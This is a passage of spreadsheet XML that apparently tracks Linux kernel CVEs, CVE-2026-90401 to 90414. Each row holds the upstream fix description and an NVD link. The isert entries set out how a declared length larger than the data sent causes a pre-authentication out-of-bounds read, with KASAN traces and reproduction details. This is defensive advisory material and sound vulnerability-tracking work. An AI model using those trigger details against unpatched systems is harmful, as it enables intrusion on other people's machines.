      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90401</t>
        </is>
      </c>
      <c r="D769" s="5" t="inlineStr"/>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="inlineStr"/>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr"/>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: remove REQ_NOWAIT support from raid1/10/456
REQ_NOWAIT support in md personalities that can block internally is
fundamentally incomplete. While reads can avoid some blocking paths,
write requests can still encounter cases where one mirror succeeds while
another returns -EAGAIN. At that point md cannot distinguish queue
pressure from a real device failure, so it can neither record a bad
block nor safely retry the write without REQ_NOWAIT, leaving mirrors
with divergent data.
Rather than continue advertising REQ_NOWAIT support for personalities
that cannot implement it correctly, remove it from raid1, raid10 and
raid456. Keep REQ_NOWAIT for linear and raid0, which only remap bios to
their underlying devices; stacked limits will still clear the feature if
any component device lacks REQ_NOWAIT support.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90401</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90402</t>
        </is>
      </c>
      <c r="D770" s="5" t="inlineStr"/>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="inlineStr"/>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr"/>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: host: Fix controller cleanup on EDL sysfs failure
mhi_register_controller() adds the controller device before creating the
optional trigger_edl sysfs file. If sysfs_create_file() fails, the error
path only drops the device reference and leaves the device registered.
Hence, call device_del() in the error path before put_device().</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90402</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90403</t>
        </is>
      </c>
      <c r="D771" s="5" t="inlineStr"/>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="inlineStr"/>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr"/>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: pci: fix error path in rtl_pci_probe()
In the last error path in rtl_pci_probe(), the cleanup functions are
skipped due to a wrong goto label. Moreover, the successful call to
rtl_init_rfkill(), ieee80211_register_hw(), rtl_debug_add_one() have to
be reverted. Fix this issue by updating the labels and adding the
relevant cleanup functions to the last error path.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90403</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90404</t>
        </is>
      </c>
      <c r="D772" s="5" t="inlineStr"/>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="inlineStr"/>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr"/>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: cros_ec_debugfs: Unregister panic notifier
cros_ec_debugfs_probe() registers notifier_panic with the EC panic
notifier chain. The remove path tears down debugfs and the console log,
but leaves the notifier registered. A later panic notification can call
back into the removed instance and queue work that accesses released
data.
Unregister the panic notifier before tearing down the debugfs and
console log state.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90404</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90405</t>
        </is>
      </c>
      <c r="D773" s="5" t="inlineStr"/>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="inlineStr"/>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr"/>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: stm32: dcmi: fix some error handling bugs in probe()
There are a few issues here:
1) After we assign:
        chan = dma_request_chan(&amp;pdev-&gt;dev, "tx");
   Then the error paths need to clean up before returning.  The first
   error path does a direct return.
2) The error paths check "dcmi-&gt;mdma_chan" but that is not assigned
   until later so it results in memory leaks.  Test "mdma_chan"
   instead.
3) The error handling calls dma_release_channel(dcmi-&gt;dma_chan) before
   "dcmi-&gt;dma_chan" has been assigned which leads to a NULL pointer
   dereference.  Use the "chan" variable instead.
I also moved the call to dma_release_channel() after the call to
dma_release_channel() so it mirrors the allocation code better.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90405</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90406</t>
        </is>
      </c>
      <c r="D774" s="5" t="inlineStr"/>
      <c r="E774" s="5" t="inlineStr"/>
      <c r="F774" s="5" t="inlineStr"/>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr"/>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: qcom: iris: handle runtime PM resume failure in core deinit
Check the return value of pm_runtime_resume_and_get() in
iris_core_deinit().
If runtime PM resume fails, skip hardware power-off operations but
still perform software teardown and state transition. Also skip the
corresponding pm_runtime_put_sync() call to avoid unbalanced runtime
PM references.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90406</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90407</t>
        </is>
      </c>
      <c r="D775" s="5" t="inlineStr"/>
      <c r="E775" s="5" t="inlineStr"/>
      <c r="F775" s="5" t="inlineStr"/>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr"/>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix overreads in ath11k_wmi_process_csa_switch_count_event()
There is no policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT, so
the parse infrastructure does not enforce a minimum length for the event
struct. Additionally, the num_vdevs field is taken directly from firmware
and used as a loop bound over the vdev_ids array without checking that it
fits within the TLV payload. Either condition can cause an out-of-bounds
read.
Add a TLV policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT so
the parse infrastructure enforces a minimum length for the fixed-size event
struct. Add a helper ath11k_wmi_tlv_data_len() to recover the payload
length of a parsed TLV from the header preceding its data pointer. Use it
in ath11k_wmi_process_csa_switch_count_event() to bound num_vdevs before
the loop.
Compile tested only.</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90407</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90408</t>
        </is>
      </c>
      <c r="D776" s="5" t="inlineStr"/>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="inlineStr"/>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="inlineStr"/>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr"/>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix overreads in ath12k_wmi_process_csa_switch_count_event()
There is no policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT, so
the parse infrastructure does not enforce a minimum length for the event
struct. Additionally, the num_vdevs field is taken directly from firmware
and used as a loop bound over the vdev_ids array without checking that it
fits within the TLV payload. Either condition can cause an out-of-bounds
read.
Add a TLV policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT so
the parse infrastructure enforces a minimum length for the fixed-size event
struct. Add a helper ath12k_wmi_tlv_data_len() to recover the payload
length of a parsed TLV from the header preceding its data pointer. Use it
in ath12k_wmi_process_csa_switch_count_event() to bound num_vdevs before
the loop.
Compile tested only.</t>
        </is>
      </c>
      <c r="T776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90408</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90409</t>
        </is>
      </c>
      <c r="D777" s="5" t="inlineStr"/>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="inlineStr"/>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr"/>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: Add vm_bind region with kbo range overlap check
When a VM is created, caller has to specify the range of the address space
carve-out set aside for mapping kernel BO's. That means vm_bind mappings of
UM-exposed BO's should not intersect with that region, but at the moment
we're not checking this.
At first, I thought of giving these values to drm_gpuvm_init() through its
reserve_{offset, range} arguments, but it turns out that is meant for VM
address spans that are not managed through the usual drm_gpuvm split/merge
circuit, so storing the end of the user VA range at VM creation time and
doing a quick check in the vm_bind ioctl path was the simplest workaround.
The new check also makes sure vm_bind range doesn't overflow the size of a
64-bit unsigned integer. That was already being done further down the call
stack inside drm_gpuvm_sm_map -&gt; drm_gpuvm_range_valid, but it's best to
fail early in the driver before GPUVM functions are invoked so that we
won't waste time allocating vm_bind context resources.</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90409</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90410</t>
        </is>
      </c>
      <c r="D778" s="5" t="inlineStr"/>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="inlineStr"/>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr"/>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: davinci: switch to managed controller allocation
The controller is allocated with the non-managed spi_alloc_host() while
the interrupt is registered with devm_request_threaded_irq().  During
removal, spi_bitbang_stop() only unregisters the controller; the
subsequent spi_controller_put() then frees the controller together with
its embedded davinci_spi devdata, which is the IRQ handler's dev_id.
The devm_request_threaded_irq() release action (free_irq()), which
drains the handler, does not run until after .remove() returns.  A late
or latched interrupt can therefore reach davinci_spi_irq() and
dereference already-freed memory.
Switch to devm_spi_alloc_host() so that the devres LIFO order releases
the controller only after free_irq() has drained the handler, and drop
the now-redundant spi_controller_put() from .remove().  The probe error
path is simplified to direct returns.
The clock is acquired with devm_clk_get_enabled(), which is registered
after the IRQ and thus released before it by the devres LIFO order.
Drain the interrupt explicitly with devm_free_irq() before disabling the
controller so that a late interrupt cannot access the registers of a
clock-gated controller.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90410</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90411</t>
        </is>
      </c>
      <c r="D779" s="5" t="inlineStr"/>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="inlineStr"/>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr"/>
      <c r="S779" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-fc: unmap cmd_iu DMA on rsp_iu mapping failure in init_request
__nvme_fc_init_request() maps cmd_iu and then rsp_iu for DMA. If the
rsp_iu mapping fails, the original code only recorded the error and fell
through: it left the already-mapped cmd_iu unmapped and still marked the
op as FCPOP_STATE_IDLE before returning. Since blk-mq does not call
.exit_request() when .init_request() fails, the cmd_iu mapping is leaked
for every op whose rsp_iu mapping fails.
Jump to an error path on rsp_iu mapping failure that unmaps cmd_iu and
returns the error without marking the op idle, so it stays in the
FCPOP_STATE_UNINIT state set by the initial memset().</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90411</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90412</t>
        </is>
      </c>
      <c r="D780" s="5" t="inlineStr"/>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="inlineStr"/>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr"/>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix return status of RMI log page on allocation failure
nvmet_execute_get_log_page_rmi() leaves 'status' holding NVME_SC_SUCCESS
(set by the successful nvmet_req_find_ns() call) when the kzalloc() for
the log buffer fails. It then jumps to the out label and completes the
request with a success status, so the host is told the command succeeded
while no data was transferred.
Initialize 'status' to NVME_SC_INTERNAL, matching the smart log handler,
so an allocation failure is reported as an internal error.</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90412</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90413</t>
        </is>
      </c>
      <c r="D781" s="5" t="inlineStr"/>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="inlineStr"/>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr"/>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: reject login PDUs declaring more data than was received
isert_login_recv_done() records how many bytes the HCA actually placed in
the login buffer, but nothing compares that against the length the login
PDU's BHS declares.  isert_rx_login_req() copies min(login_req_len,
MAX_KEY_VALUE_PAIRS) bytes into login-&gt;req_buf, and the login code then
reads the declared length back out of that buffer - for the first PDU in
iscsi_target_locate_portal(),
	payload_length = ntoh24(login_req-&gt;dlength);
	tmpbuf = kmemdup_nul(login-&gt;req_buf, payload_length, GFP_KERNEL);
and for the ones after it in iscsi_decode_text_input(), reached from
iscsi_target_do_login().
login-&gt;req_buf is a fixed MAX_KEY_VALUE_PAIRS (8192) byte allocation, so
an initiator that declares more than it sends reads off the end of it,
before authentication and with the length under its control:
  BUG: KASAN: slab-out-of-bounds in kmemdup_nul+0x43/0x80
  Read of size 8193 at addr ffff8881056a8000 by task iscsi_np/167
   __asan_memcpy+0x23/0x60
   kmemdup_nul+0x43/0x80
   iscsi_target_locate_portal+0x48d/0x1180
   iscsi_target_login_thread+0x19a9/0x3350
  Allocated by task 167:
   __kmalloc_cache_noprof+0x158/0x370
   iscsi_target_login_thread+0x971/0x3350
  which belongs to the cache kmalloc-8k of size 8192
  allocated 8192-byte region
Falsifying the second login PDU instead reaches the other reader, on the
same buffer:
  BUG: KASAN: slab-out-of-bounds in kmemdup_nul+0x43/0x80
  Read of size 8193 at addr ffff888104d10000 by task kworker/1:1/50
  Workqueue: isert_login_wq iscsi_target_do_login_rx
   __asan_memcpy+0x23/0x60
   kmemdup_nul+0x43/0x80
   iscsi_decode_text_input+0xc6/0x11c0
   iscsi_target_do_login+0x261/0x1470
   iscsi_target_do_login_rx+0x51d/0x7d0
iscsit over TCP is not exposed: iscsit_get_login_rx() validates the
declared length with iscsi_target_check_login_request() and then reads
exactly that many bytes off the socket, so the declared length governs
how much arrives rather than how much is copied out of an already-filled
buffer.  isert does not call iscsi_target_check_login_request() at all.
Reject a login PDU whose declared DataSegmentLength exceeds what was
received, in both paths that reach isert_rx_login_req():
isert_get_login_rx() for the first login PDU and isert_login_recv_done()
for the ones after it.  dlength &lt;= login_req_len is allowed because the
received count can include up to three bytes of iSCSI padding.
Once the check is in place the copy out can no longer exceed the copy in:
the posted login SGE is ISER_RX_PAYLOAD_SIZE, so login_req_len cannot
exceed MAX_KEY_VALUE_PAIRS and the min() in isert_rx_login_req() is
login_req_len.
Like the existing short-PDU check added by 29e7b925ae6d, the reject in
isert_login_recv_done() returns without completing login_req_comp, so a
malformed subsequent PDU leaves the login to be torn down by the login
timer rather than failing immediately.  The first-PDU path returns an
error and fails straight away.
Reproduced on 7.2.0-rc4 with soft-RoCE (rdma_rxe) under KASAN, using an
initiator that sends the real key=value payload while declaring 8193 in
the BHS, on the first login PDU and on the second in separate runs.  The
reported read size tracks the declared value exactly; 16384 and 61440
behave the same.  Unpatched 3 of 3 runs report on each of the two paths,
patched 0 of 3 on both, run alternately in a single session, and a normal
login still completes on the patched build.</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90413</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90414</t>
        </is>
      </c>
      <c r="D782" s="5" t="inlineStr"/>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="inlineStr"/>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr"/>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: reject PDUs declaring more data than was received
isert_recv_done() hands each received PDU to the opcode handlers without
ever looking at wc-&gt;byte_len, the number of bytes the HCA actually placed
in the receive descriptor. The handlers then copy that many bytes - the
data-segment length the initiator declared in the BHS
(ntoh24(hdr-&gt;dlength), via the derived unsol_data_len / imm_data_len) -
out of the fixed-size descriptor:
  isert_handle_iscsi_dataout():
        sg_copy_from_buffer(sg_start, sg_nents, isert_get_data(rx_desc),
                            unsol_data_len);
  isert_handle_scsi_cmd():
        sg_copy_from_buffer(cmd-&gt;se_cmd.t_data_sg, sg_nents,
